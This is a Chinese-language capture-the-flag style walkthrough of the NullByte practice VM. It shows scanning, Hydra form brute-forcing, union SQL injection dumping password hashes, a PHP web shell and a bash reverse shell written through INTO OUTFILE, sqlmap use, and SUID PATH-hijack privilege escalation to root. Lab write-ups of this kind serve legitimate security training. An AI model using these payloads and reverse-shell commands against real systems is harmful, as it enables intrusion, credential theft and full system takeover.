Linux渗透实战之Nullbyte靶场提权教学文档<\/h1>

0x1 靶场概述<\/h2>

Nullbyte靶场是一个以SQL注入为主的渗透测试练习环境，涉及以下核心技能点：<\/p>

Hydra表单暴力破解<\/li>
John md5哈希暴力破解<\/li>
多种SQL注入技术（手工注入、文件写入、反弹shell）<\/li>
SQLmap自动化注入<\/li>

SUID提权技术<\/li> <\/ul>

0x2 信息收集阶段<\/h2>

1. 主机探测<\/h3>

arp-scan -l
<\/span><\/span><\/code><\/pre>发现靶机IP：192.168.103.160<\/p>
2. 端口扫描<\/h3>
nmap -sS -A -p- 192.168.103.160
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

80 (HTTP)<\/li>
111 (RPC)<\/li>
777 (SSH，注意是修改后的端口)<\/li>
38389<\/li>
<\/ul>
3. 漏洞扫描<\/h3>
nmap --script=<\/span>vuln -p80,111,777,38389 192.168.103.160
<\/span><\/span><\/code><\/pre>发现：<\/p>

\/phpmyadmin\/目录<\/li>
可能存在CVE-2007-6750漏洞（HTTP DoS漏洞，本靶场中无实际利用价值）<\/li>
<\/ul>
4. 目录扫描<\/h3>
gobuster dir -u http:\/\/192.168.103.160 -w \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt
<\/span><\/span><\/code><\/pre>发现重要目录：<\/p>

\/uploads\/<\/li>
\/phpmyadmin\/<\/li>
\/javascript\/<\/li>
<\/ul>
0x3 Web渗透阶段<\/h2>
1. 初始信息收集<\/h3>

网站根目录只有main.gif图片<\/li>
使用exiftool分析图片：<\/li>
<\/ul>
exiftool main.gif
<\/span><\/span><\/code><\/pre>发现隐藏字符串：kzMb5nVYJw（实际为隐藏目录）<\/p>
2. Hydra表单爆破<\/h3>
发现\/kzMb5nVYJw\/目录下有密码输入表单，使用Hydra爆破：<\/p>
hydra 192.168.103.160 http-form-post "\/kzMb5nVYJw\/index.php:key=^PASS^:invalid key"<\/span> -l routing -P \/usr\/share\/wordlists\/rockyou.txt
<\/span><\/span><\/code><\/pre>爆破成功，密码为：elite<\/p>
3. SQL注入漏洞发现<\/h3>
进入后界面存在搜索功能，发现420search.php文件，存在GET传参，测试存在SQL注入漏洞。<\/p>
0x4 SQL注入技术详解<\/h2>
方法一：手工联合注入<\/h3>

确定列数：<\/li>
<\/ol>
" order by 1,2,3 -- -
<\/span><\/span><\/span><\/code><\/pre>
获取数据库名：<\/li>
<\/ol>
" union select 1,2,database() -- -
<\/span><\/span><\/span><\/code><\/pre>结果：seth<\/p>

获取表名：<\/li>
<\/ol>
" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- -
<\/span><\/span><\/span><\/code><\/pre>结果：users<\/p>

获取列名：<\/li>
<\/ol>
" union select 1,2,group_concat(column_name) from information_schema.columns where table_name="<\/span>users" -- -
<\/span><\/span><\/span><\/code><\/pre>结果：id,user,pass,position<\/p>

获取用户凭据：<\/li>
<\/ol>
" union select 1,2,group_concat(pass) from users -- -
<\/span><\/span><\/span><\/code><\/pre>得到base64编码的MD5哈希：YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE<\/p>
解码后MD5：c6d6bd7ebf806f43c76acc3681703b81<\/p>
解密得到密码：omega<\/p>
方法二：写入一句话木马<\/h3>
" union select "<\/span><?<\/span>php system<\/span>($<\/span>_GET['cmd'<\/span>]); ?><\/span>", 2, 3 into outfile "<\/span>\/<\/span>var\/<\/span>www\/<\/span>html\/<\/span>uploads\/<\/span>shell.php" -- -
<\/span><\/span><\/span><\/code><\/pre>利用：<\/p>
?cmd=<\/span>cat \/var\/www\/html\/kzMb5nVYJw\/420search.php
<\/span><\/span><\/code><\/pre>获取数据库凭据：<\/p>

用户：root<\/li>
密码：sunnyvale<\/li>
<\/ul>
方法三：写入反弹shell<\/h3>
写入nc.php：<\/p>
" union select "<\/span><?<\/span>php exec<\/span>(\<\/span>"\/bin\/bash -c 'bash -i >& \/dev\/tcp\/192.168.103.129\/1234 0>&1'\"<\/span>); ?><\/span>", 2, 3 into outfile "<\/span>\/<\/span>var\/<\/span>www\/<\/span>html\/<\/span>uploads\/<\/span>nc.php" -- -
<\/span><\/span><\/span><\/code><\/pre>监听：<\/p>
nc -lvnp 1234<\/span>
<\/span><\/span><\/code><\/pre>访问\/uploads\/nc.php获取反弹shell<\/p>
方法四：SQLmap自动化注入<\/h3>
sqlmap -u "http:\/\/192.168.103.201\/kzMb5nVYJw\/420search.php?usrtosearch=1"<\/span> --dump --batch
<\/span><\/span><\/code><\/pre>0x5 提权阶段<\/h2>
1. SSH登录<\/h3>
ssh ramses@192.168.103.160 -p 777<\/span>
<\/span><\/span><\/code><\/pre>密码：omega<\/p>
2. SUID提权<\/h3>
发现具有SUID权限的可执行文件：<\/p>
ls -la \/var\/www\/backup\/procwatch
<\/span><\/span><\/code><\/pre>输出：<\/p>
-rwsr-xr-x 1 root root 4932 Aug  2  2015 \/var\/www\/backup\/procwatch
<\/code><\/pre>
提权步骤：<\/p>

创建sh的软链接：<\/li>
<\/ol>
ln -s \/bin\/sh ps
<\/span><\/span><\/code><\/pre>
修改环境变量：<\/li>
<\/ol>
export PATH=<\/span>.:$PATH
<\/span><\/span><\/code><\/pre>
执行procwatch：<\/li>
<\/ol>
.\/procwatch
<\/span><\/span><\/code><\/pre>成功获取root权限<\/p>
0x6 技术要点总结<\/h2>


信息收集<\/strong>：全面扫描端口和目录，不放过任何细节（如图片元数据）<\/p>
<\/li>

密码破解<\/strong>：合理使用Hydra和字典文件<\/p>
<\/li>

SQL注入<\/strong>：<\/p>

掌握多种注入技术（联合查询、文件写入）<\/li>
了解写入文件的前提条件（secure_file_priv为空、知道绝对路径）<\/li>
<\/ul>
<\/li>

提权技术<\/strong>：<\/p>

关注SUID权限文件<\/li>
理解环境变量在提权中的作用<\/li>
掌握符号链接的利用方法<\/li>
<\/ul>
<\/li>

防御建议<\/strong>：<\/p>

限制数据库文件写入权限<\/li>
严格控制SUID权限<\/li>
避免在Web目录存放敏感信息<\/li>
使用参数化查询防止SQL注入<\/li>
<\/ul>
<\/li>
<\/ol>

Linux渗透实战之Nullbyte靶场提权教学文档<\/h1>

0x2 信息收集阶段<\/h2>

0x3 Web渗透阶段<\/h2>

3. SQL注入漏洞发现<\/h3> 进入后界面存在搜索功能，发现420search.php文件，存在GET传参，测试存在SQL注入漏洞。<\/p>

0x4 SQL注入技术详解<\/h2>

0x5 提权阶段<\/h2>

3. SQL注入漏洞发现<\/h3>
进入后界面存在搜索功能，发现420search.php文件，存在GET传参，测试存在SQL注入漏洞。<\/p>